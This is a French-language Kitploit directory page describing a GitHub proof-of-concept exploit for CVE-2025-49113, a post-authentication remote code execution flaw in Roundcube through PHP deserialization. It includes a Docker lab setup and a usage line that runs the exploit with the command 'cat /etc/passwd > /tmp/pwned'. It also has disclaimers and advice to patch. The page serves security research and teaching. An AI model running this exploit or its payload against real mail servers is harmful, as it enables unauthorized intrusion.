Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49113 — Exploit RCE post-authentification pour Roundcube ≤ 1.6.10 via désérialisation d'objets PHP, avec mise en place d'un laboratoire basé sur Docker et documentation technique pour la recherche en sécurité et l'éducation. | Kitploit
Outils/GitHubGitHub/fearsoff-org/cve-2025-49113
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubfearsoff-org/cve-2025-49113

CVE-2025-49113

Exploit RCE post-authentification pour Roundcube ≤ 1.6.10 via désérialisation d'objets PHP, avec mise en place d'un laboratoire basé sur Docker et documentation technique pour la recherche en sécurité et l'éducation.

Voir le dépôt
10823il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

📧 Roundcube ≤ 1.6.10 RCE post-authentification via désérialisation d'objets PHP [CVE-2025-49113]

🔍 Analyse

Une vulnérabilité critique d'exécution de code à distance post-authentification a été découverte dans Roundcube (versions ≤ 1.6.10), causée par une désérialisation d'objets PHP non sécurisée. Cette grave faille est restée silencieusement présente dans la base de code pendant plus de 10 ans.

Pour l'analyse technique complète et les détails d'exploitation, visitez :

👉 https://fearsoff.org/research/roundcube


🐳 Installation rapide (via Docker)

Ceci installera Ubuntu 24.04, Roundcube et toutes les dépendances nécessaires dans un conteneur Docker :

root@kitploit:~
docker run --name ubuntu24 \
  -p 9876:80 \
  -v "$PWD/rc_install.sh":/root/rc_install.sh \
  -it ubuntu:24.04 \
  bash -c "chmod +x /root/rc_install.sh && /root/rc_install.sh && exec bash"

⚠️ Remarque : À utiliser uniquement dans des environnements isolés. N'exposez pas les instances vulnérables à l'internet public.

⚠️ Avertissement

Ce code de preuve de concept est fourni à des fins éducatives et de recherche uniquement. L'auteur et les contributeurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages résultant de l'utilisation de ce code. L'utilisation non autorisée sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite est illégale et strictement interdite.

Exécution :

Assurez-vous d'avoir php installé sur le système

root@kitploit:~
php CVE-2025-49113.php http://127.0.0.1:9876/ roundcube fearsoff.org "cat /etc/passwd > /tmp/pwned"

👤 Auteur et crédits

  • Auteur : Kirill Firsov (https://x.com/k_firsov)
  • Organisation : FearsOff (https://fearsoff.org)

🛡️ Atténuation

Si vous exécutez Roundcube ≤ 1.6.10, mettez à jour vers la dernière version corrigée immédiatement pour éliminer cette vulnérabilité.


📜 Licence

Ce projet et la documentation associée sont fournis sous licence MIT.

Télécharger l’outil